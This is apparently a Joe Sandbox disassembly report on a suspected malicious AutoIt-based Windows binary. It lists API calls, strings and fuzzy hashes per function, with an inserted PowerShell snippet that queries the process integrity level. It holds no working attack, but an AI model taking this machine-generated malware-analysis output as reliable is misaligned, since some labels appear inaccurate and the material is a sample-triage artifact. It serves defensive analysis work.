                              • Instruction ID: e1ea4217fdb6c20568a3f7eb82b96809383b741121d7f5311792d3f8927cc4b3
                              • Opcode Fuzzy Hash: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
                              • Instruction Fuzzy Hash: 03016D31D18A1DDBCF10DFE9E8985EDBB79FB0A715F400056E801F2540DB309654D7A1
                              APIs
                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?,?,008D799D), ref: 008D766F
                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D768A
                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?), ref: 008D76A8
                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D76B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: From$Prog$FreeStringTasklstrcmpi
                              • String ID:
                              • API String ID: 3897988419-0
                              • Opcode ID: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                              • Instruction ID: a7635f9374926504eff1c9466c5a3c43598b98c767924322e631dbb87aeb02be
                              • Opcode Fuzzy Hash: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                              • Instruction Fuzzy Hash: 59017172615605AFDB209F58EC44AAA7BADFB44751F14412AFD05D2211F731DE40A7A0
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008D8628
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                              • Instruction ID: 9e201a4b9b0bb6d659ef51e331a1adea2de6af731156759d8b93155607b9c698
                              • Opcode Fuzzy Hash: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                              • Instruction Fuzzy Hash: C6F04F31219304EFEB200FA9EC9DE6B3BACFF89764B004526F945C6250CB61DD41EA60
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8689
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                              • Instruction ID: bd1e3b698592f5a79b0e8b9180156b75416e02b111f772602558c2209d5825c7
                              • Opcode Fuzzy Hash: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                              • Instruction Fuzzy Hash: C8F04F71214304FFEB211FA5EC9CE673BACFF89764B100126F945C7250CA61DA41EA60
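The two functions above (008D8608 and 008D8669) show the standard two-call GetTokenInformation idiom: a first call with an empty buffer that fails with ERROR_INSUFFICIENT_BUFFER (hence the GetLastError), a HeapAlloc of the returned size, then the real call. The following is an added example, not code from the report or from the AutoIt runtime, that reproduces the idiom from PowerShell for the current process and decodes the integrity label. One caveat for anyone reading the report: the Windows SDK value of TokenIntegrityLevel is 25 (2 is TokenGroups, 3 is TokenPrivileges), so the class actually passed at 008D8669 should be confirmed from the disassembly rather than from the report's "00000003(TokenIntegrityLevel)" label. The example assumes a Windows host with .NET available to Add-Type and needs no elevation.

```powershell
# Added example (not from the report or the AutoIt runtime): the two-call
# GetTokenInformation idiom, applied to the current process token.
$source = @"
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

public static class TokenIntegrity
{
    const uint TOKEN_QUERY = 0x0008;
    // TOKEN_INFORMATION_CLASS.TokenIntegrityLevel is 25 in the Windows SDK
    // (2 is TokenGroups, 3 is TokenPrivileges).
    const int TokenIntegrityLevel = 25;
    const int ERROR_INSUFFICIENT_BUFFER = 122;

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool GetTokenInformation(IntPtr token, int cls, IntPtr buffer, uint length, out uint returned);
    [DllImport("advapi32.dll")]
    static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
    [DllImport("advapi32.dll")]
    static extern IntPtr GetSidSubAuthority(IntPtr sid, uint index);
    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")]
    static extern bool CloseHandle(IntPtr handle);

    public static uint GetIntegrityRid()
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, out token))
            throw new Win32Exception();
        try
        {
            uint needed;
            // Call 1: zero-length buffer. Expected to fail with ERROR_INSUFFICIENT_BUFFER
            // (the GetLastError seen in the report) and report the size to allocate.
            if (!GetTokenInformation(token, TokenIntegrityLevel, IntPtr.Zero, 0, out needed)
                && Marshal.GetLastWin32Error() != ERROR_INSUFFICIENT_BUFFER)
                throw new Win32Exception();
            // The report's GetProcessHeap/HeapAlloc step; AllocHGlobal here.
            IntPtr buffer = Marshal.AllocHGlobal((int)needed);
            try
            {
                // Call 2: same class, correctly sized buffer.
                if (!GetTokenInformation(token, TokenIntegrityLevel, buffer, needed, out needed))
                    throw new Win32Exception();
                // Buffer holds a TOKEN_MANDATORY_LABEL; its first member is the label PSID.
                IntPtr sid = Marshal.ReadIntPtr(buffer);
                byte count = Marshal.ReadByte(GetSidSubAuthorityCount(sid));
                // The last sub-authority of S-1-16-<rid> is the integrity RID.
                return (uint)Marshal.ReadInt32(GetSidSubAuthority(sid, (uint)(count - 1)));
            }
            finally { Marshal.FreeHGlobal(buffer); }
        }
        finally { CloseHandle(token); }
    }
}
"@
Add-Type -TypeDefinition $source

# SECURITY_MANDATORY_*_RID values from the SDK.
$levels = @{ 0x1000 = 'Low'; 0x2000 = 'Medium'; 0x2100 = 'Medium Plus'; 0x3000 = 'High'; 0x4000 = 'System' }
$rid  = [TokenIntegrity]::GetIntegrityRid()
$name = if ($levels.ContainsKey([int]$rid)) { $levels[[int]$rid] } else { 'Unknown' }
'Integrity RID 0x{0:X4} ({1})' -f $rid, $name
```

Run it once from a normal console and once from an elevated one to see the RID move from 0x2000 to 0x3000; Add-Type compiles the type only once per session, so re-running the script in the same session reuses it.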
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC6BA
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC6D1
                              • MessageBeep.USER32(00000000), ref: 008DC6E9
                              • KillTimer.USER32(?,0000040A), ref: 008DC705
                              • EndDialog.USER32(?,00000001), ref: 008DC71F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                              • Instruction ID: 2a76fe1a56d3a90bbb20e009aba9cc31639f326908885cecea342dc31c8b4e50
                              • Opcode Fuzzy Hash: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                              • Instruction Fuzzy Hash: 4F018F30414709ABEB315B24EC5EF9677B8FB00705F04066AF582E15E0DBE1AA54DB80
                              APIs
                              • EndPath.GDI32(?), ref: 008813BF
                              • StrokeAndFillPath.GDI32(?,?,008BBAD8,00000000,?), ref: 008813DB
                              • SelectObject.GDI32(?,00000000), ref: 008813EE
                              • DeleteObject.GDI32 ref: 00881401
                              • StrokePath.GDI32(?), ref: 0088141C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: 5f6c4aa4aed902c055a1f690cf58bc90ed23c2e35013ab0c8122eb287724130c
                              • Instruction ID: e9df6116cf7c0bde632ba2b5bc7c98953684a7e95883881fad69eeed81b3a1c1
                              • Opcode Fuzzy Hash: 5f6c4aa4aed902c055a1f690cf58bc90ed23c2e35013ab0c8122eb287724130c
                              • Instruction Fuzzy Hash: DAF0BBB4028308DFDB215F16EC1CB543FA9F702326F04C224E42985AB1C7354596EF55
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 008EC69D
                              • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC6B5
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • CoUninitialize.OLE32 ref: 008EC922
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_memmove
                              • String ID: .lnk
                              • API String ID: 2683427295-24824748
                              • Opcode ID: 6fabe454fac54d6b1aa58e32e43aa04b0541977867022e1bbc2166155d75de3e
                              • Instruction ID: 8f4a432177ba66e2cf07f9644c3217a68676f663d31b9358a36c0191f9acfefe
                              • Opcode Fuzzy Hash: 6fabe454fac54d6b1aa58e32e43aa04b0541977867022e1bbc2166155d75de3e
                              • Instruction Fuzzy Hash: A7A11871108205AFD304FF58C891EABB7E8FF95708F044959F196D72A2EB70EA49CB52
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 00887BB1: _memmove.LIBCMT ref: 00887C0B
                              • __swprintf.LIBCMT ref: 0089302D
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892EC6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 1943609520-557222456
                              • Opcode ID: fb2982b3b0cbf8f3d74a07cbcfb86b9534a3c5fb307267dc9f2b9f446ddaf6e4
                              • Instruction ID: fdbeb97854c37d10cee3fecbdc7b86cfffe0d14aa0457487b794782c808e3e8f
                              • Opcode Fuzzy Hash: fb2982b3b0cbf8f3d74a07cbcfb86b9534a3c5fb307267dc9f2b9f446ddaf6e4
                              • Instruction Fuzzy Hash: 10914531518601AFCB28FF28D885D6AB7B4FF85750F14492DF492DB2A1EA70EE44CB52
                              APIs
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                              • CoInitialize.OLE32(00000000), ref: 008EBC26
                              • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EBC3F
                              • CoUninitialize.OLE32 ref: 008EBC5C
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                              • String ID: .lnk
                              • API String ID: 2126378814-24824748
                              • Opcode ID: 4e39c09521d300ba7f4056e1ad69e211d73abc9eee4e40cc172090ea200e9d39
                              • Instruction ID: bd4e5cde5e89deef9fc827ce70d951085aa881022f3c67234b780251137aa817
                              • Opcode Fuzzy Hash: 4e39c09521d300ba7f4056e1ad69e211d73abc9eee4e40cc172090ea200e9d39
                              • Instruction Fuzzy Hash: 95A132756043419FCB10EF19C884D6ABBE5FF89314F148998F89ADB2A1CB31ED45CB92
                              APIs
                              • __startOneArgErrorHandling.LIBCMT ref: 008A52DD
                                • Part of subcall function 008B0340: __87except.LIBCMT ref: 008B037B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorHandling__87except__start
                              • String ID: pow
                              • API String ID: 2905807303-2276729525
                              • Opcode ID: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                              • Instruction ID: 541879a80a9d71487af26c6bee33b02815af430b16128580083d08e04d8d61b9
                              • Opcode Fuzzy Hash: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                              • Instruction Fuzzy Hash: 57517B21A1DA0686EB106718C9513FF6BD0FB42754F208968E4D5C1BE9EF748CD4EE8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$+
                              • API String ID: 0-2552117581
                              • Opcode ID: ed8068881ab7960d8236f041549ff48d88082b54f3c4c2ff2122a0927ca270e0
                              • Instruction ID: e177b24426fed319861020d9ebe2817b895ba4bd35e830b76dbf98b90a4d8509
                              • Opcode Fuzzy Hash: ed8068881ab7960d8236f041549ff48d88082b54f3c4c2ff2122a0927ca270e0
                              • Instruction Fuzzy Hash: 3151EE7550524A9FDF25AF28C4886FA7BA6FF1A310F144167E891DB3A0D7309D42CB71
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$_memmove
                              • String ID: ERCP
                              • API String ID: 2532777613-1384759551
                              • Opcode ID: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                              • Instruction ID: 464392f45572afbfa8a0129d152eb3749e6935c2edea7a04e67ba21332db2e73
                              • Opcode Fuzzy Hash: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                              • Instruction Fuzzy Hash: 4B51CE719007099BDF24DFA4C8857AABBF4FF04314F24856EEA4ACA240F7709A90CB44
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0090F910,00000000,?,?,?,?), ref: 00907C4E
                              • GetWindowLongW.USER32 ref: 00907C6B
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00907C7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 653ee64c902fc26e6361611bf20c7d0f1b51222a219f97c9de42e46be05596ec
                              • Instruction ID: cbed356bc9210932ee81d19b69da87c704f6c3cb8b3b0cc1014b349e5593ae6d
                              • Opcode Fuzzy Hash: 653ee64c902fc26e6361611bf20c7d0f1b51222a219f97c9de42e46be05596ec
                              • Instruction Fuzzy Hash: B831AE31604205AEEB219F78CC45BEAB7ADFB45334F244725F8B5D22E0D731E8519B60
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009076D0
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009076E4
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                              • Instruction ID: a9bd2436b8e10adca23d1250864e3622183c34a14664a78fcc2dc9318d6c49e5
                              • Opcode Fuzzy Hash: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                              • Instruction Fuzzy Hash: 74219132514219BFDF11CF94CC46FEA3B69EB88764F110214FE15AB1D0DAB6B8519BA0
                              APIs
                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906FAA
                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906FBA
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00906FDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$MoveWindow
                              • String ID: Listbox
                              • API String ID: 3315199576-2633736733
                              • Opcode ID: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                              • Instruction ID: 77ae787e3f90a7f71c48f7d697350cc1a7acdeb29283822a81fc5a790cc2804f
                              • Opcode Fuzzy Hash: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                              • Instruction Fuzzy Hash: 7321C532610119BFDF118F54DC85FAB37AEEF89754F018124FA04971D0C771AC619BA0
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009079E1
                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009079F6
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907A03
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884C2E), ref: 00884CA3
                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884CB5
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetNativeSystemInfo$kernel32.dll
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884CE1,?), ref: 00884DA2
                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884DB4
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884D2E,?,00884F4F,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884D6F
                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884D81
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,?,009012C1), ref: 00901080
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00901092
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008F9009,?,0090F910), ref: 008F9403
                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008F9415
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetModuleHandleExW$kernel32.dll
                              APIs
                              • CharLowerBuffW.USER32(?,?), ref: 008FE3D2
                              • CharLowerBuffW.USER32(?,?), ref: 008FE415
                                • Part of subcall function 008FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FDAD9
                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE615
                              • _memmove.LIBCMT ref: 008FE628
                              Similarity
                              • API ID: BuffCharLower$AllocVirtual_memmove
                              APIs
